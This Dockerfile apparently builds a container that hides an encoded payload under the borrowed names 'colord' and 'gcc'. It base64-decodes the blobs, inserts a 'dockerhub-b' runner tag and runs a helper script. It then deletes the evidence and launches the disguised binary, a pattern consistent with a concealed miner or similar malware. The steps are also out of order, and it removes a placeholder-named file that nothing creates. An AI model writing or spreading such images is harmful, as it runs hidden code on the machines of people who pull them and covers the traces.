FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > colord.log'
RUN base64 --decode colord.64 > colord
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY colord .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' colord
RUN bash ./docker.sh
RUN rm --force --recursive colord _REPO_NAME__.64 docker.sh gcc gcc.64

CMD colord
